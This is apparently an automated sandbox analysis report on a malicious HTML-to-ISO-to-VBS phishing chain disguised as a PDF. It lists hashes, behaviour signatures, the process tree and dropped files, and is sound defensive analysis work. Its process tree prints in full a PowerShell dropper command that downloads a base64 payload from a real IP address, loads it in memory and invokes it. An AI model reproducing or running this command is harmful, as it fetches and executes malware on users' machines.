Overview

overview

10

Static

static

URFT06GSBA...F.html

windows7-x64

10

URFT06GSBA...F.html

windows10-2004-x64

10

Resubmissions

30-09-2022 14:36

220930-ryr9faegar 10

30-09-2022 14:33

220930-rwy9zadgh5 1

Analysis

  • max time kernel
    206s
  • max time network
    208s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    30-09-2022 14:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    URFT06GSBAWRP_001_PDF.html

  • Size

    198B

  • MD5

    497443cc310648bda5f2a737147b8e7e

  • SHA1

    8b97df0f61c01d75dcc8c47f3a147f24a81538b9

  • SHA256

    22670bbf031cb76a3d98d4fe13e60fa0412401f4b40bc94e186048ddbf63ac26

  • SHA512

    bf19a9c3c6f3a0a118d3f425f00308b2478c1f11eb0ae9028a5c1891e1b71276aaae3b9eb8f6750df8345378820d69046563ceb94963e64ca8776e05d9cad641

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 43 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\URFT06GSBAWRP_001_PDF.html
    1⤵
    • Modifies Internet Explorer Phishing Filter
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1564
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1564 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:2004
    • C:\Windows\System32\isoburn.exe
      "C:\Windows\System32\isoburn.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XB6YKGN8\URFT06GSBAWRP_001_PDF.ISO"
      2⤵
        PID:680
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      1⤵
        PID:1620
      • C:\Windows\system32\AUDIODG.EXE
        C:\Windows\system32\AUDIODG.EXE 0x16c
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:952
      • C:\Program Files\7-Zip\7zG.exe
        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF\" -spe -an -ai#7zMap23439:104:7zEvent19216
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:556
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF\RQK02HVBPO_002_PDF.vbs"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:112
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('9a82ea0d2fb5-1179-4854-75ce-8a89ca37=nekot&aidem=tla?txt.cnysay/o/moc.topsppa.483ca-dpoj/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
          2⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1112
      • C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF\URFT06GSBAWRP_001_PDF.exe
        "C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF\URFT06GSBAWRP_001_PDF.exe"
        1⤵
        • Executes dropped EXE
        PID:1096

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        Filesize

        60KB

        MD5

        d15aaa7c9be910a9898260767e2490e1

        SHA1

        2090c53f8d9fc3fbdbafd3a1e4dc25520eb74388

        SHA256

        f8ebaaf487cba0c81a17c8cd680bdd2dd8e90d2114ecc54844cffc0cc647848e

        SHA512

        7e1c1a683914b961b5cc2fe5e4ae288b60bab43bfaa21ce4972772aa0589615c19f57e672e1d93e50a7ed7b76fbd2f1b421089dcaed277120b93f8e91b18af94

        Download Submit
      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
        Filesize

        1KB

        MD5

        a266bb7dcc38a562631361bbf61dd11b

        SHA1

        3b1efd3a66ea28b16697394703a72ca340a05bd5

        SHA256

        df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

        SHA512

        0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

        Download Submit
      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        ce57dadd620a2877d454da90c3344eac

        SHA1

        d3cd77f8cadb5d00b9a6c1cddbe2b2d42fddc5ec

        SHA256

        69060ccaf86b6db1e9076adacde082937e7d51fba129892e069ad2936cf5262e

        SHA512

        b7c735faf3bee993280b6903c715d80dad7f8752284f388fb62f7eb2beeaa898a42c61f8071006c963dc57954bc741a35022ceb23d79a59d0eb4b5cd2773ab8d

        Download Submit
      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
        Filesize

        242B

        MD5

        ef4a8666488e25f8d05b2e3223eda571

        SHA1

        826825f6ecbef26ae46b2b007db545a7db2ae261

        SHA256

        7aababea875a1721c2513a8a83174b6a7fc3a41dfa44c1e3f1aa592544e5b5de

        SHA512

        bad295ff1301820f62bda1be7b8dce93a3fd06b88eba5e1c803cf5e5aa781192ec78c631815ef5f1a71b43119206b3ba12c4a8afc16eb2309d12bb8dfc1ae8a1

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XB6YKGN8\URFT06GSBAWRP_001_PDF.ISO.lj2t37e.partial
        Filesize

        300.8MB

        MD5

        37dc1aa37c82b73e59376f88fc2c3e8f

        SHA1

        8811fee5c76b96fe8e05bca588987daca34d1254

        SHA256

        f04488660b3ccf2ac4cede57a6a11cee34fe1125183c9ca7474382e3cc1d7050

        SHA512

        59c26259b582c181c2c188821cac344706c6b8b09156696b9ecbeaf0cb140dc977484754412d5e11c07ef905502c44eaffd3b7c1d9137cb12b76134172e459f5

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\N0DDJLUM.txt
        Filesize

        608B

        MD5

        2ecf5de5b963aced0b50e82ab682cc3e

        SHA1

        e903b342aa1652568c136a188c4c7868780ab0ee

        SHA256

        5ed596ee0f16d960fc4c68d8d0bd12bfe4e540a08f74292db03f2eec2c143e1d

        SHA512

        e2c8266b5256c19fa1ab6a2e7793db34ca1390f384e2266ab2b52b968ffbc2ed4e1a923ab42ff28a40819cf44192320488bed897ba6bbd07913d91140ce973fa

        Download Submit
      • C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF.ISO.n29o7bl.partial
        Filesize

        300.8MB

        MD5

        37dc1aa37c82b73e59376f88fc2c3e8f

        SHA1

        8811fee5c76b96fe8e05bca588987daca34d1254

        SHA256

        f04488660b3ccf2ac4cede57a6a11cee34fe1125183c9ca7474382e3cc1d7050

        SHA512

        59c26259b582c181c2c188821cac344706c6b8b09156696b9ecbeaf0cb140dc977484754412d5e11c07ef905502c44eaffd3b7c1d9137cb12b76134172e459f5

        Download Submit
      • C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF\RQK02HVBPO_002_PDF.vbs
        Filesize

        219KB

        MD5

        86d9cdbe85e0b345c00063cb59efda75

        SHA1

        6990625fff03cdc505a7c9a224c39fb9c1b1ab80

        SHA256

        541752eae29c171bb8ab3f5851b6f58ba58035298b8781990998d22cd4982f6e

        SHA512

        0f39d5b741cb5fc822f17306537a4659c5ff191f18ef47e18aa3f604eb9d4598f1c01316068285531916a57bd0410b27fd8d44adb3bda41ee691098cd5b1bc2f

        Download Submit
      • C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF\URFT06GSBAWRP_001_PDF.exe
        Filesize

        97.7MB

        MD5

        e5c6ea76cf6badaa5ba4d382ce895266

        SHA1

        2b32a9c2b87d8c41629708f283988b266a48e9d7

        SHA256

        2f489ee55d5322cc6717e6ff690da0675601159b3e3de0b12142aa300862a161

        SHA512

        d9ff4e39c578bf8fbfafed5ae78181fdfe887659dcf3e2278abf517fd81701559817a0ee98107a966fd47d5159ef0da3fddce6295c6d13474a45d1e256a5c0a5

        Download Submit
      • C:\Users\Admin\Downloads\URFT06GSBAWRP_001_PDF\URFT06GSBAWRP_001_PDF.exe
        Filesize

        95.5MB

        MD5

        4272544d6b59dfcbc7bdca819416fc0e

        SHA1

        4a7db0d89b2ce3ec6c56a2475c64ec59e7f28bee

        SHA256

        dd5882295358dcdf2508567dfca058b192316f4052375caf909e57a1e87cf340

        SHA512

        0b34b2f83dc9fe6cde2f8c84340d434eb5524f43305e288d1591604fe6222112e3347677a6c7a9f12a8c819aab6d3bbdea973ed1af23af164ad67e66fc78208e

        Download Submit
      • memory/680-55-0x0000000000000000-mapping.dmp
        Download
      • memory/680-56-0x000007FEFBCE1000-0x000007FEFBCE3000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1096-72-0x0000000075FB1000-0x0000000075FB3000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1096-71-0x0000000001370000-0x00000000013A2000-memory.dmp
        Filesize

        200KB

        Download
      • memory/1112-73-0x000007FEEE2E0000-0x000007FEEED03000-memory.dmp
        Filesize

        10.1MB

        Download
      • memory/1112-69-0x0000000000000000-mapping.dmp
        Download
      • memory/1112-74-0x000007FEED780000-0x000007FEEE2DD000-memory.dmp
        Filesize

        11.4MB

        Download
      • memory/1112-75-0x0000000002514000-0x0000000002517000-memory.dmp
        Filesize

        12KB

        Download
      • memory/1112-76-0x000000001B6F0000-0x000000001B9EF000-memory.dmp
        Filesize

        3.0MB

        Download
      • memory/1112-77-0x000000000251B000-0x000000000253A000-memory.dmp
        Filesize

        124KB

        Download
      • memory/1112-78-0x0000000002514000-0x0000000002517000-memory.dmp
        Filesize

        12KB

        Download
      • memory/1112-79-0x000000000251B000-0x000000000253A000-memory.dmp
        Filesize

        124KB

        Download